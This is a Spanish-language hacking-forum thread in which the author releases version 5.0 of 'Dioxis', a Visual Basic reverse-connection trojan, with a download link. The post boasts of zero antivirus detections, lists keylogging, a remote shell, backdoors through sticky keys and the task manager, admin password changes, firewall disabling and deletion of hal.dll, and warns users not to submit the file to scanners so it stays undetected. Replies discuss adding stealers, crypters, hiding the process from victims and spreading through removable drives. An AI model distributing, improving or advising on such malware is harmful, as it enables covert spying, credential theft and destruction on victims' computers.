Foro de elhacker.net

Bueno Para la gente que estaba esperando, siento la tardanza, no es que me cueste realizar vuestras peticiones, sino que he estado montando una web que me esta dando algun que otro quebradero de cabeza al usar multiples lenguajes, vamos que esta version la he realizado en un dia

Direis porque no saque la 6.0, lo dejo para mas tarde ya que tardaria mas y por lo que he oido los av ya detectan las version 5.0 estandar, bueno, las peticiones que han sido aceptadas son:

---

• Ordenacion de todo el codigo y sus ficheros
• Cambio de imagenes .jpg a .gif
• Comentarios en todas las lineas (ya no te perderas)
• Arreglo de Keylogger (URRAAAA)
• Simplificacion de ordenes para mandar paquetes
• Eliminacion de variables muertas y aplicacion de option explicit
• Los modos funny,dioxis y normal, han sido simplificados a un simple formulario con botones (es lite, no la verson 6.0 :P acordaros)

Y lo mas asombroso de todo es que gracias a toda la depuracion del codigo nos encontramos sorpresas como estas:

---

File Info

Report generated: 18.9.2009 at 1.26.00 (GMT 1)
Filename: server.exe
File size: 128 KB
MD5 Hash: 6266304325c04ec155a107f7b7c47ae9
SHA1 Hash: 8A9AA3157C97CF59448C9ECC39B2FDE80DCE1388
Self-Extract Archive: Nothing found
Binder Detector: Nothing found
Detection rate: 0 on 23

Detections

a-squared - -
Avira AntiVir - -
Avast - -
AVG - -
BitDefender - -
ClamAV - -
Comodo - -
Dr.Web - -
Ewido - -
F-PROT6 - -
Ikarus T3 - -
Kaspersky - -
McAfee - -
NOD32 v3 - -
Norman - -
Panda - -
QuickHeal - -
Solo Antivirus - -
Sophos - -
TrendMicro - -
VBA32 - -
VirusBuster - -
ZonerAntivirus - -

---

Aqui teneis el servidor indetetable, y aqui viene el analisis del cliente

File Info

Report generated: 18.9.2009 at 1.14.27 (GMT 1)
Filename: dioxis.exe
File size: 932 KB
MD5 Hash: f2ca6efbf5e0beb5b9247f38fcc71304
SHA1 Hash: 5DCDA3E5BD1DB669DB61CCE9C7A1D8D4D6BE916C
Self-Extract Archive: Nothing found
Binder Detector: Nothing found
Detection rate: 1 on 23

Detections

a-squared - Backdoor.Win32.VB!IK
Avira AntiVir - -
Avast - -
AVG - -
BitDefender - -
ClamAV - -
Comodo - -
Dr.Web - -
Ewido - -
F-PROT6 - -
Ikarus T3 - -
Kaspersky - -
McAfee - -
NOD32 v3 - -
Norman - -
Panda - -
QuickHeal - -
Solo Antivirus - -
Sophos - -
TrendMicro - -
VBA32 - -
VirusBuster - -
ZonerAntivirus - -

Scan report generated by
NoVirusThanks.org (http://novirusthanks.org)

Bueno, un antivirus que no importa por la parte del software que no importa, asi que no os alarmeis, la cosa ha mejorado y ahora podreis disfrutar de todo, con mayor estabilidad, fiabilidad ante detecciones de antivirus y etc

---

---

Tamaño Cliente: 2,35 MB
Archivos: Cliente Dioxis y Libreria COMDLG32.OCX
Lenguaje: Visual Basic 6.0
Conexion: Inversa
Tiempo de Reconexion: Personalizada
Tiempo de Refresco de fin de conexion: 1 segundo
Idioma: Español
Puerto usado: Personalizado
Infraestructura: Red Local e internet

---

Bueno antes que nada decir que esta version esta llena de cosas nuevas, la estructura de codigo del troyano se ha alargado bastante y el diseño sigue siendo uno de los mayores beneficios que acompañan a este software

La version 4.0, como ya vi, era detectada por varios antivirus asi que me decidi por realizar la 5.0 improvisando segun lo que se me iba ocurriendo. A continuacion os cito las funciones antiguas y las nuevas:

---

Ejecucion de:

    * Paint
    * Teclado Universal
    * Buscaminas
    * Solitario
    * Pinball
    * Calculadora
    * Paseo de Win Xp
    * Star Wars
    * Mensajes personalizados
    * Paginas Web


Matanza de Procesos:

    * Messenger
    * Navegadores (Firefox,Iexplorer,Safari, Opera y Google chrome)
    * Explorador de Windows
    * Proceso Personalizado

Creacion de Puertas Traseras:

    * Habilitar terminal server
    * Establecer una cmd en sticky keys (compaginado con ts, tienes el control total del pc)
    * Establecer una cmd en vez del administrador de tareas (para que no pueda ver las tareas)

Sistema:

    * Edicion de la contraseña de administracion a la que se quiera
    * Cierre de Sesion
    * Apagar Pc
    * ELIMINAR HAL.DLL (No se iniciara windows si no es reparado :/ )

    * Keylogger
    * Shell Remota
    * Creacion de archivos remotamente

---

    * Imagen inicial del programa
    * Soporte para nick de usuario (Basta de conocer cada host por la ip :P)
    * Deteccion de Unidades
    * Deteccion de nombre de host remoto y posibilidad de modificarlo para su siguiente reinicio
    * Keylogger y chat mejorado ( Antes podrias abrir las veces que quisieras el keylogger lo que daba lugar a errores, y el chat lo mismo)
    * Jugar con la victima ( Juego de preguntas y respuestas remotamente)
    * Eliminar archivos remotos
    * Activar o desactivar el firewall de Windows
    * Vulnerar el host remoto a ataques syn flood

Y lo que mas os ayudara en el troyano es su manual que viene integrado con el, el cual te ayuda a averiguar tu ip externa, a crearte un dominio no-ip, y a poder abrir tus malditos puertos del router (si es que tienes)

    * Manual de ayuda al usuario(creacion de server y configuracion xD)

---

Bueno como es tradicion, explicare de nuevo en que consiste dioxis:

Dioxis, como ya se ha dicho es un troyano que se caracteriza por su sencillez, no porque no tenga prestaciones sino porque todos los controles estan pensados para usuarios noveles. Esto no se contrasta con que no lo puedan usar los usuarios avanzados ya que posee como en su 2,3 y 4 version, de una shell que se puede manejar a gusto si la persona tiene cierto nivel de programacion BATCH

Dioxis, aun siendo un software simple como pueden ver, tiene bastante potencial y actualmente esta muy escondido de los antivirus, cosa que a la hora de escoger un troyano, buscamos mas

Este software coge el control total o medio parcial de la cpu, podiendo tener una shell remota, manejando el archivo de losg del teclado, creando archivos…etc

Dioxis posee funciones automatizadas para los menos adentrados en este mundillo, estas funciones se dividen en 3 tipos:

Modo funny: El modo divertido ^^,si eres una buena persona y no te atrae la destruccion, cosa que se premia mucho en este mundillo, este modo te ayudara con tus tareas, posee funciones como ejecucion de aplicaciones, ejecutar pelicula de star wars o mandarle mensajes personalizados


Modo Normal: Este modo esta dedicado a la matanza de procesos que corren en el pc remoto y a abrir paginas web o cerrar sesion, un poco mas cruel que el funny mod pero util si quieres pillar contraseñas de msn por ejemplo, cosa muy tipica


Modo Dioxis: El dioxis mod, seria en teoria la forma mas cruel de usar este software, consta ge generar backdoors, apagar el pc, eliminar el hal.dll…etc


He evitado en este modo hacer las cosas crueles ya que este software aun no es detectado ^^ abstenganse gente cruel :P

los Modos de troyanizar no los he tocado, como veis, tienen las mismas opciones y la misma interfaz, que yo creo que por ahora esta bien

---

El chat ha sido mejorado, ya que a veces no se cerraba la ventana del chat remoto al ordenarselo, ya que habia cierto descontrol con los paquetes que viajaban por la red, que al juntarse no se interpretaban bien


Si os fijais bien, en la version 4 los botones de comandos no se cerraban lo cual podria dar lugar a un fallo en la conexion y que todo el tinglado se caeria, fallo mio :/ xD

La interfaz del usuario sigue siendo la misma, yo me centro en vosotros :P que pelota xD

---

Bueno en este Tema vereis que le doy mucha importancia a lo nuevo ya que quiero que os empapeis bien de las cosas nuevas y que las sepais utilizar aun siendo facilongas

Acordaros, no lo subais a ninguna pagina de analisis online, ni lo analiceis con vuestro av si teneis habilitada el envio de archivos sospechosos automaticamente, esto fastidia la version del troyano haciendola detectable y algun dia no habra otra version

Evitar la heuristica de los av es facil, esta version es detectada por heuristica en 3 av desconocidos en los que no reparo en codigo jeje

El juego de preguntas no tiene mas sentido de hacer preguntas y decirle si es correcta o no, es decir, pasar un tiempo agradable en vez de estar torturando a la victima borrandola sus archivos

El keylogger fue mejorado ya que antes se podia iniciar las veces que quisieras y te copiaba los logs muchas veces dando lugar a textos sin comprension, ha sido probado en mi red local y funciona perfectamente

El chat, mas de lo mismo, arreglado

La deteccion de drives viene bien si teneis conocimientos de infeccion por unidades extraibles ya que os podeis ganar unos cuantos hosts mas


El soporte para nick, al igual que la deteccion del nombre del equipo sirve para detectar al host correcto, lluego tambien teneis la opcion de cambiarle los dos nombres si te apetece


En esta version tambien he añadido el activar y desactivar el firewall remoto al igual que una opcion que vuelve vulnerable a los XP a ataques SYN FLOOD, aunque si no sabes de ataques de denegacion de servicio no te servira de mucho pero nunca esta de mas

Y como ya os dije para que os guieis mas en la creacion de este he diseñado un manual para el que os guiara pero si teneis dudas, comentad o mandar un email

---

---

(http://img29.imageshack.us/img29/4756/descargarw.png) (http://www.fileden.com/files/2008/3/2/1791774/Dioxis%205.0%20LITE%20BY%2050L3R.rar)

muy muy bueno tu troyano soler! te admiro che!  y lo que mas me gusta es ese tipito rojo! ocmo lo hisiste? jajaj

HOla jajajaj.
-
Buen aporte s0l3r de verdad espero que me funcione man, ya que siempre tengo dramas en los puertos, pero te felicito, no todos sabemos crear nuestros propios troyanos, y mucho menos dibulgarlo gratis, te doy + 10 puntos
-
.......... ;-) ;-) ;-) ;-) ;-) ;-) ;-) ;-) ;-)
-

yeah  :D, espero que os guste ;)

Un buen cambio ;)

Te lo añado al recopilatorio...

128KB siguen siendo demasiados.... :P

no logro bajarlo mas :P

he eliminado todo lo que pude

No creo, apenas son un par de segundos (si hablamos de transmision via red :P)

no suele tardar mucho, 7 segundos en conectarse

Son los malos del mario bross, que recuerdos  ;D:


Buen trabajo 50l3r, vas progresando, veremos que tal la 6  ;).

Saludos

Correcto, ese es 'ShyGuy', un tio vergonzoso :xD
Mas info:

---

Para la proxima hay que añadir MultiConexion y algunas funciones nuevas eh?

PD: Hacker_Zero, modifique el tamaño de la imagen...

jajj! esta bien gracias! me encanta el gordito corriendo! jejej, uin saludo! hackerzero! tu inyeccion sql taller lomas!

Gracias Karcrack, la había puesto y no miré el post a ver como quedaba, grande mod  ::).

---

OFFTOPIC:
Gracias, eso me recuerda que hace un año o más que prometí continuarlo con blind y aún no lo hice  :-[. A ver si éste año...  :xD.

---

Saludos

haber que menjoras tengo, al menos la de coger el clipboard del usuario remoto que es facil jeje, multiconexion que me lo facilito argos...etc

Voy a ser duro esta vez :P

• Eso de estar matando algunos procesos no me gusta mejor ponle Process manager :P
• Todavia falta la multiconexión
• Para tan pocas funciones no veo de donde saca tanto peso :/

PD: Estoy de vacaciones ahora(le encontre wifi a un vecino :xD ) voy a rebisar todo el codigo y voy a ver si yo le puedo bajar un poco el peso en mi casa ( en una semanita ;) ) .

Saludos ;)

ok, hombre no tiene pocas funciones  :rolleyes: tiene unas cuantas

el dataarrival del server esta petadisimo

No uses tantos modulos de clases... o metelos todos juntitos...

es el csocketmaster del cliente lo unico que puedo quitar, y poner winsock

No, estoy hablando del Server...
No lo he mirado, pero el Server no tenia dos clases? Una del Keylogger, y otra del CSM?

si, la que me dijistes que cambiase, el keylogger, pero la verdad estuve mirando el codigo de leandro y no entendi nada, paso de copiarlo sin mas, asi que tendre que estudiarlo mas

ademas ese no llevaba modulo no es asi?

Para mi si tiene pocas opciones :P pero bueno es cosa de opiniones ;) .

Te doy ideas que para mi son funciones minimsa que tiene que tener un buen troyano ;)

• Multiconexion(ya se que yala dije :xD )
• Stealer(por ultimo las versiones mas nuevas como IE8,FF 3.5.x,etc.. )
• FileManager
• Captura de pantalla :P

Eso seria para mi los requisitos minimos de un buen troyano :P

opino yo:

1 - el codigo no lo veo ordenado todavia, falta algo que se llama indentación.

2 - el peso obviamente se debe a la cantidad de imagenes cargadas en los forms, usar imagenes para icono es una cosa, pero usar una imagen completa para una pantalla como la de ayuda ya se pasa...lo podes hacer tranquilamente con labels en el form y te va a pesar muchisimo menos, si lo queres hacer liviano olvidate de las imagenes pesadas, es preferible hacerlo todo en diseño desde el form que meter imagenes.

3 - la interfaz sera el gusto tuyo y de algunos usuarios, pero te digo la verdad a mi no me gusta nada, es muy grotesca, fijate como esta realizados los mejores troyanos del mundo que existen para darte una idea de diseño.

4 - como te dijeron la multiconexion es vital, el troyano mas feo ya trae esa opcion.

5 - me duelen los ojos de ver el codigo del servidor, no entiendo nada(no porque no entienda) sino por la indentación que pide a gritos el codigo "INDENTENME , INDENTENME..."

6 - yo me bajaria los mejores troyanos y empezaria a ver la funciones que tienen...porque eso de la ventanita de chat, el mensajito que manda, y todo eso es basico y ya esta quemado.

7 - cambiarle el nombre a los controles, a todos...no dejarle el nombre por defecto que es horrible.

no te enojes, pero es como lo veo yo, si lo queres hacer ver profesional, vas a tener que ponerle ganas, 100 veces mas de las que pusiste todavia.

saludos.

Sigue siendo inmune a los antivirus mas usados  ::)
-
Lo malo es que no tiene la opcion icon changer pero igual se agradece de nuevo el aporte  ;D
-
Espero que nunca necesite un encriptador ya que asi solito engaña a mucha gente ignorante jejeje...
-
Y bueno sin mas que decir Utilicenlo para el bien y no para el mal (exepto los enemigos y el tipo que le robo a tu novia etc)
-
Un saludo a aguante DIOXIS  ;-) ;-) ;-) ;-) ;-) ;-) ;-) ;-)
-------------------------
BY: BUking  :¬¬

el odigo del server si que se entiende, tiene todo comentario para saber como funciona, y es facil, la mayoria del codigo esta en el dataarrival, solo tienes que darte cuenta

lo del manual y las imagenes eso si que se podria cambiar porque son imagenes grandes

para mi la interfaz me gusta mucho, no siempre hay que seguir a los troyanos grandes y dejar de inventarse cosas nuevas por el simple hecho de que x troyano se hizo famoso

No intento llegar al nivel de otros troyanos, unicamente programar algo y hacerlo evolucionar cada vez mas

Excelenteee me encanto!

 puede ser q en windows 7 algunas cosas no funcionen??

solitario,pinball...etc

dichas apliaiones no suelen estar ya en windows 7 pero unicamente nos referimos a las acciones de abrir programas

 :D Hey como le haces para programar sin identacion yo ya habia visto el ClickGenerator y tampoco la tenia pero el codigo era un poco mas sencillo pero hacer un server sin identacion  :o ni me lo inmagino hay que tener un cerebro de 128 bits  :laugh: para hacer algo asi jeje..


  Saludos...

a qu te refieres con indentacion

Hola 5ol3r!
Ante todo felicitaciones a mi me gusto y veo que lograras un troy completo al mas puro estilo profesional.
Tengo una pregunta, y es: porque no me deja compilar desde el cliente el numero de puerto , etc?
Tu cliente el que dejasteis ya compilado funciona pero el del proyecto no te deja hacerlo.
Me arroja el siguiente error:
server=partes (1) & subfirma & timeconex & subfirma & iconox
Un saludo .-

Esto:
Envez de esto...

Usando Tabulaciones claro... yo he usado espacios para el ejemplo...

a leches

pues es porque mi cabeza esta muy loca, no hace falta organizarse

si vieses los codigos de la web que estoy realizando, tambien pensarias lo mismo, estan desorganizados, lo de los comentarios los puse para la gente, que se guie

---

cark, para poder cimpilar el server no se puede hacer desde visual basic, tienes que generar los exe y juntarlos con el programa de eon, pidesele a el, ya que si lo facilito seria sin su consentimiento

Bueno para juntar el server y el cliente estaría bien que aprendieras a usar el Add-in de VB6 de recursos, lo de E0N ya tiene tiempo y por ejemplo él mismo en su Small Joiner ya lo hizo con los recursos.

Lo de la identación hazlo, yo si veo un código sin identar paso de leerlo  :P. Si está bien identado es fácil de leer, y visualizas la estructura ya en el primer vistazo. Imagínate que ahora tu dejas del proyecto Dioxis y dentro de 1 año quieres retomarlo, al no estar familiarizado con el código, el esfuerzo que tienes que hacer para volver "entenderlo" será más grande que si está bien identado. Es acostumbrarse a eso, siempre pensando en los que van a leer el código que será la primera vez que lo vean.

Saludos

pues el dia que me ponga a sacar la version 6 ordenare el codigo

la verdad lo del joiner aun no lo manejo, lo tendre que ver y crearme uno yo, asi pasar de usar soft de otros

Bueno haber empiezo a no entender nada.

1. Abro el programa

2. Creo el server

2.1 Pongo xxxx.no-ip.info
2.2 Pongo el puerto 3545 o cualquier otro me da igual
2.3 y los milisegundos

3. Se lo mando en un rar a un amigo,

4. El lo abre

5. Me aparece "mi ip" se quiere conectar contigo, osea xxxx.no-ip.info se quiere conectar contigo.

6. Acepto

7. Abro el funny mod o alguno de esos, intengo abrir el paint y me lo abre obviamente en mi pc o mando mensajes y me los manda a mi ! jajaja... A mi me parece una nobatiada pero he probado de todas formas y no se en que le erro o si me baje una version que funcionaba mal jaja.. bue no entiendo nada, me estara haciendo efecto la cerveza ya no se jaja , saludos. Y a la v1ctima(mi amigo) no le sucede nada de nada....

no entiendo tu pregunta

Mi pregunta es. Si es mi amigo quien abre el server. Porque no es el quien se conecta a mi, sino que soy yo que me conecto a mi.. Se logra entender? osea luego de que mi amigo abre el server y se conecta toco algunas opciones del funny mod  y estos programas se abren en mi pc no en la de el.. Porque no es para eso que sirve este soft?

POr que seguramente tu tienes un server ejecutado en tu PC que establece primero conexión ;)

Si acabo de enterarme de que el server se ejecuta en cada inicio de sesion  :xD. Supongo que sera un proceso... saludos  :silbar:

ahi esta la osa, el proceso es llamado ekrn32.exe

y esste troyano no se copia al registro, sino que se copia a la carpeta de inicio de cada s.o

Hay indentadores automaticos o "beautifiers" que son una autentica maravilla, tienes que probarlos

mm no me vendrian mal jj

   :D Estoy casi seguro que este señor mando el servidor y se quedo con el cliente en casa   :silbar:

Esque lo que ha de mandar es el servidor, el cliente lo utiliza el gamberro jodepc's o usuario que testea la aplicación o la úsa con consentimiento de terceros.

  No se pero en la conexion inversa uno tiene el server y el cliente es el que se conecta y desde el server se le gira instrucciones al cliente pero ya es un estandard decirle a la victima servidor y al victimario cliente de todas maneras no me paren que tengo un poco de cebada fermentada en el cerebro  :silbar:



   Saludos....

el servidor es el que te sirve todas las cosas que se puede hacer con el cliente


exacto, para la siguiente version quitare lo de hal.dll que es muy cruel

Siento contestar aquí a Sol3r, esque havia otro hilo que he escrito una parrafada de la ostia y algun mod lo debe haber borrado (muy oportuno  :¬¬ :xD). La cuestion esque 5ol3r comentava que se puede hacer un virus en pocas líenas y le dicho que me ponga un ejemplo.


Dudo que alguien que no sepa programar* pueda hacer el dioxis o cualquier otro troyano. No he visto el codigo fuente de este y no lo mirare, no me interesan los troyanos, pero ya digo yo que es imposible.

sepa programar* <>  copiar codigo, coger codigo prestado

lo que digo que para hacer virus no te hace falta saber muchisimo

yo empece a realizar el dioxis mientras iva leyendome el aprenda vb como si estuviera en primero, ahora ha mejorado mucho, pero la version 1 que estara por aqui, tednria muchisimos errores y demas

a lo que quiero llegar no es a contradecirte de que los novatos se pongan a hacer cosas de estas, ya que no me gusta nada, ademas yo realizo estos softs unicamente para aprender mas y compartir, a lo que quiero llegar es a que tampoco necesitas saber muho unicamente

por ejemplo, la caja negra de mi firma es una web que estoy haciendo, con php,css,html,javascript y sql sin pasar antes por un manual, unicamente leyendo por google

saludos y espero no generar disputas  ;)

El Dioxis no tiene pocas lineas otra cosa es que tu escribiste pocas lineas ;)

En VB los novatos como 50l3R ( en muchos lenguajes ) suelen copiar codigos como el cSocketMaster y luego decir que fue facil hacerlo y no entienden como funciona ni el 50% del codigo.

 :D

Eso es pa pleito :

(http://www.freewebs.com/jcarlosbosch/Karate%201.jpg)

No 5ol3r, ni mucho menos dicutir  ;) pero yo ando luchando para que los que se inicien no solo se centren en copiar codigo o que hagan aplicaciones mas interesantes que un virus tras otro y dices tu que en pocas lineas se hace  :xD

Hay que concienciar a los usuarios que se inician pero no para fastidiarles y que gasten tiempo aprendiendo a programar, sino para que podamos subir el nivel en general y que la gente encuentre nuevas espectativas sobre el tema de la programación.

No , para nada la idea no es discutir :P , solo digo la realidad :P

De donde sacaste qu yo copie codigo? el csocket master claro que no es mio, ponte y hazme uno como el que esta en mi codigo sin ningun error haber si eres capaz

todo el codigo demas es mio, el keylogger por ejemplo lo cojo de ideas que veo por internet y luego lo modifico a mi gusto, lo demas est todo ideas mias

nose porque sacas tales conclusiones la verdad, solo para desacreditar mi trabajo  :-\

Lo que no se puede hacer es reinventar la rueda, si ya existe el CSoketmaster, ¿para que hacerlo de 0?

es lo que no entiendo de yst, nose si el y karcrack me decian de pasarme a csocketmaster y dejar de lado winsock, lo hice y ahora me dice lo contrario

YO te recomende el modulo de Leandro... porque es facil de entender... ademas de que es mucho mas ligero que el CSM...

no le vi, me dijistes que viese el keylogger, pero como aun estoy con lios de paginas webs la version 6 la dejare para rato

tampoco voy a sacar versiones porque si cuando piensan que copio codigo  :¬¬

Es manejo de api's , lo eh hecho miles de veces es cosa que leas mis bot's IRC entre otros :P

rea un csocket master entero

llevo pocos meses con vb y ya te digo que no he copiado nada de codigo

Para que un cSocketMaster entero si necesito solo una parte , es ridiculo solo seria poner codigo de mas y usar mas espacio :P

No lo tomes mal no estoy diceindo que copies a lo lammer , que seria poner el codigo sin creditos ni nada ;)

pero esque lo unico que no es mio, es el juntador de eon, que puedo hacer uno cuando pueda y el csocketmaster que claramente no se crear uno, tambien podria usar un winsock, pero, tampoco seria mio ya que yo no lo codee

Ves lo que decía, en unos pocos meses puedes aprender una base, algo de nivel medio pero suponiendo que ha sido autodidacta tomaré que el nivel es inferior al de un estudiante de ingenieria (no me vengan con rollos de autodidactas superdotados...)

En pocos meses un estudiante de ingeneria no programa un troyano, y alguien autodidacta es todavía más imposible.

En cuanto a la discusión del CSocketmaster e suna tonteria dscutir, da igual si la usas, eso no es copiar ni nada, cualquier la usaria. En cuanto al juntador de EON ves, eso si que se considera copiar.

Ains, no se porque siempre acabo metido en el mismo debate cuando alguien dice aprender a programar en unos meses...La programación necesita una base, no vale ver un tutorial de "haz tu primer troyano"...

Para hacer un troyano se requiere teoria, base, lógica, experiéncia...y para todo ello lo mejor es asistir a un centro docente o una dedicación autodidacta pero real, buena, con buenos libros docentes y a base de tiempo y practicar.

Una persona que dice programar un troyano en unos pocos meses consideraré que no sabe programar. Por regla de tres, un niño de seis años puede hacer un hola mundo y decir que sabe programar.

coincido, los conocimientos no son los mismos y no se lleva una estructura ordenada siendo autodidata, a no ser que seas muy organizado


Necesito un buen manual para vb
« en: 03 Mayo 2009, 22:15 »

esa es la feha en la que pedi un manual para empezar, y ya voy por la version 5 del troyano

respecto al joiner de eon, se lo pedi en la version 2 o 3 me parece y aun no he hecho el mio, asi que tendre que hacerlo para la siguiente version

el tema este yo lo pienso asi, pueden estar de aceurdo o no...pero es lo que veo y con mi experiencia en los foros.

bueno primero lo de la version 5.0 no se si es para tanto, hay que saber bien que version poner en los programas, no poruqe yo aumente la version es que sea muchisimo mejor y tenga mas experiencia, busca cualquier programa y fijate cuando cambia en 1 la version , y veras que el cambio no es una pantallita mas, sino es un cambio en toda la aplicación. yo creo que para tu programa deberias ir aumentando en 0.1 y no en 1 cada vez que le cambias algo, eso es relativo y el numero de la version es independiente del saber de uno.

el tema de la copia de codigo de otros autores o simplenente la "orientacion" y la "adaptacion" de los codigos a las necesidades de uno, es simple.

1 - hay gente que copia codigo de otras webs, funciones..etc..pare por lo menos que sepamos como funciona el codigo, ya que hay algunos que copian y pegan y armando el codigo pero no sabe como funciona internamente, solo saben "que fucniona" y con eso se conforman.

2 - lo mejor es que uno si llega a copiar el codigo de una web, es que en nuestro programa, la logica la hagamos nosotros, porque de nada sirve usar miles de codigos de otras web y armar asi un programa, porque no seria nuestro el programa, seria una copia de distintas webs y al final nosotros no seriamos autores de nada, solo del copy & paste.lo que importa es que la logica del programa sea realmente nuestra.

3 - todos sabemos ya el tema este de los troyanos,que hacer uno no te da derecho a que te llamen "programador", por muchas razones: una porque habiendo tantos codigos de troyanos disponibles, cualquier novato que se inicie en visual basic, agarra un codigo de uno ya hecho, y lo unico que tiene que hacer es cambiarle la interfaz, y pequeñas cosas, que lo hagan parecer como "propio", cuando en realidad la "logica" la armo otro, a no ser que el troyano sea realmente avanzado y no "mas de lo mismo" como veo en este foro y en otros, porque caundo veo uno que es "mas de lo mismo" ya se sabe que fue copia de otro.

4 - no se puede armar un programa con copias de partes de otros programas, la verdad yo en vez de hacer eso no haria nada, lo digo por el joiner de EON, a mi no me daria la "cara" para agregarlo a un programa mio, y que todos sepan que esa parte la hizo enteramente otro usuario, solo para agregarle una funcioncita mas a mi troyano, porque sino voy a emepezar a hacer un troyano con partes de otros programas, entonces me junto el joiner de EON, el cripter de jose perez, el creador de server de juancito, el melt server de fulano,etc. eso no es programar.

5 - por lo menos que la logica del programa sea enteramente tuya...si usas funciones o modulos de otros autores poner el credito siempre, y por lo menos tener la idea de que es lo que hace cada linea de codigo, porque de nada sirve, tener metido un modulo y no saber que hace ni una linea del mismo, y solo "usarlo".

esto no lo digo para este post, y tampoco digo que 50l3r sea un "Copy & Paster And Modify Profesional", el sabe bien lo que hace. sino lo digo en general para cuando se postea un programa como estos.

saludos.

Una aclaracion:
50l3r NO es ningun ripper....

No lo digo por decir eh? ;)

Por favor, no sigais por este camino... no quiero bloquear el tema :-\

 ;D

  
    :xD me inmagino a que los creditos seran en el codigo fuente no ?

Karcrack no veo que estémal discutir esto, si es offtopic no pasa nada, si sirve de algo hablar sobre esto se crea otro tema. El tema no va con 5ol3r, pienso exactamente igual que  seba123neo, se ha de ser realista y saber los límites que tiene cada uno.

Un troyano no se programa ni en 3 ni en 5 meses. Es más, fijaos en esto, un sencillo EMULE en en la teoria mas sencillo que programar un troyano, simplemente se usa una matriz de controles winsock con envio de datos.

Alguien que sepa programar programa un "emule"? no? Pues esa es la explicación  ;).

Si alguien cree que puede, deberia ser capaç de hacerlo sin mirar el codigo de un "emule x".

PD: En la universidad uno de los proyectos que proponen es hacer una especie de napster, (parecio al emule pero mas específico). No me fastidies que sabe lo mismo el que a programado un proyecto SUYO y ha logrado hacer un "napster" a uno que con un manual y copiando alguna/as funciones hace un troyano.

No le veo nada de malo hablar sobre eso, sobre todo para que nuevos usuarios se mentalizen y sepan que caminos seguir. Si hace falta se abre otro hilo.

de algo que me caracterizo es de darme siempre por aludido aunque sea mentira, de los temas que se hablan sobre copiar codigo, es un defecto mio

Todo el codigo de este troyano, como ya dije esta realizado por mi, de lo que nuna me podra quitar nadie este imaginaicion, cuando voy por la calle con mis amigos, cuando espero en la parada del bus, cuando como, cuando esto en el baño, pienso en nuevas funciones para agregar a un programa mio o para crear uno que se me ocurra


Como bien dices sebaneo, las versiones podrian ser menos, y poner 3.2, 4.2, 4.3 ..etc ya que por ejemplo messenger va por la 9 y lleva musimo mas tiempo que yo


por ejemplo, el csocket master tiene autor, en el codigo, como bien dices Jaixxon Jax , tambien por ejemplo en el joiner de eon, despues de pedirle permiso para usarlo, coji y le puse mas creditos en msgboxes


Yo nunca me he referido a mi como programador por crear un troyano, la verdad no me defino como nada ya que autodefinirse como algo esta mal visto, nadie va diciendo que es hacker o programador, mas bien, cuando te lo dicen molesta

Saludos y 0% intenicion de disputa :)

Por favor quiero saber como esconder el proceso de este troyano a mi victima por favor contesten rapido ^^

   :D Ahorita te mando mi RootKit agregame por el msn XD  :P .
 
    Eso que pides creo que no es gratis por lo menos no he encontrado nada por alli excepto un ejemplo de Karckrack con mutex  :silbar: que todavia no termino de asimilar  :-[  no es que sea imposible sino que ese tipos de cosa nadie la spublica por alli a la ligera yo doy fe de que se puede ocultar el archivo y evitar que lo terminen hasta evitar que lo borren pero todavia no he logrado esconderlo .


 
  jeje yo ya ni duermo pensando en mis juguetes  :xD lo que si te digo es que lo haces de gratis y eso es de rescatar  :laugh: me quede sorprendido cuando vi que la primera version la habias lanzado en mayo y miralo ya donde lo llevas asi yo llegue hace dos tres meses al subforo buscando info de como pasar un viejo server a conexion inversa y ya donde voy  :¬¬ .


  Saludos ....
 

mi naturaleza es compulsiva, no tengo intermedio, si me gusta una cosa no dejare de hacerla hasta cansarme, me centro en esa cosa y me olvido de lo demas

Yo no digo que esta mal o que esta bien lo que haces, porque me imagino que esto para ti y para algunos(me incluyo) es otra manera de invertir su tiempo y aprender cosas nuevas , por ejemplo, en mi caso no vivo de esto (de la programacion). Por lo tanto creo que tampoco deberian de tomarse esto tan a pecho... si nos ponemos con esa actitud, de esa manera tan estricta, de decir "tu copiaste tal y tal cosa, por lo tanto esta mal porque no lo hiciste tu" me parece algo absurdo , ya que al fin y al cabo todos hemos copiado algo (dudo mucho que hayan inventado los libros de donde estudiaron y aprendieron). Ahora lo que no apoyo son a los que "roban" el trabajo de otros, por lo tanto, insisto no se deberia confundir: a los que roban trabajos, y los que copian trabajos respetando el deseo del autor (ya sea para su estudio, uso, etc). Pero de la manera como discuten este tema, pareciera que para poder decir que el "troyano" es 100% creacion de el, el tuvo que haber inventado todo el codigo, el lenguaje de programacion en que se realizo, el SO en el que corre, la computadora en que corre el SO, y asi puede seguir la cadena hasta descubrir en realidad quien es el creador de que xD

A mi me parece que esta bien hablar de estos temas, ya que tambien se discute un poco de programacion en general, se refuerzan las reglas del foro de alguna forma

y solo queria decir que por ejemplo: 5ol3r se acordará, empezamos masomenos al mismo tiempo vb6.
el crea el troyano, y buen yo seguia un poco con los manuales y haciendo mini aplicaciones, hasta que dije.. bueno voy a hacer un troyano... todavía lo estoy haciendo!!! mira cuanto paso... unos 6 meses, me trabe haciendo la transferencia de archivos, pero creo que a karcrack le habia dicho por msn, que preferia pensarlo por yo mismo, no importa si consume mas recursos,sea mas pesado o que, pero lo hice yo!.(no digo que soler no lo haya hecho el, solo comentaba)!  :xD

esta bueno a veces NO buscar en google. a ver que te ofrece tu imaginacion


saludos!

Para mí hay 3 tipos de "programadores":

1 Se saca códigos de la manga, lo quiere hacer todo él y tiene pensada hasta la última línea, lo que le permite comprender al 100% su programa.

2 Hace su programa de 0 usando aveces códigos/modulos de terceros para ahorrar tiempo aunque siempre se encarga de comprender todo el código que mete en su programa para poder entender al 100% lo que su programa está haciendo en cada momento.

3 Coje un programa ya hecho y lo modifica a su gusto o busca códigos y los ensambla sin saber su funcionamiento interno.

Para mi 50l3r es del tipo 1, ya que le hubiera sido muy fácil cojer un troyano como el Shark, copiar los módulos de las funciones, incluírlo en su proyecto y tendría un troyano con muchas más funciones en 10 minutos, pero el no quiso, lo intentó hacer de 0 con sus ideas y para mí eso vale mucho  :P.

Tambien el tipo 2 no merece descalificación, yo muchas veces uso o códigos o ideas de otras personas. Por ejemplo en lo que decíais del emule, si estás en la Universidad aprendiendo programación lo ideal es ser del tipo 1, pero cuando no nos interesa demasiado aprender X cosa, podemos utilizar el trabajo de otro que ya lo ha hecho anteriormente y así poder dar un paso más sin perder tiempo reinventando la pólvora, y al fin y al cabo es lo que se hace en la ciencia, nadie te llama copión cuando utilizas las conclusiones a las que llegó Newton para resolver un problema  :xD.

Saludos

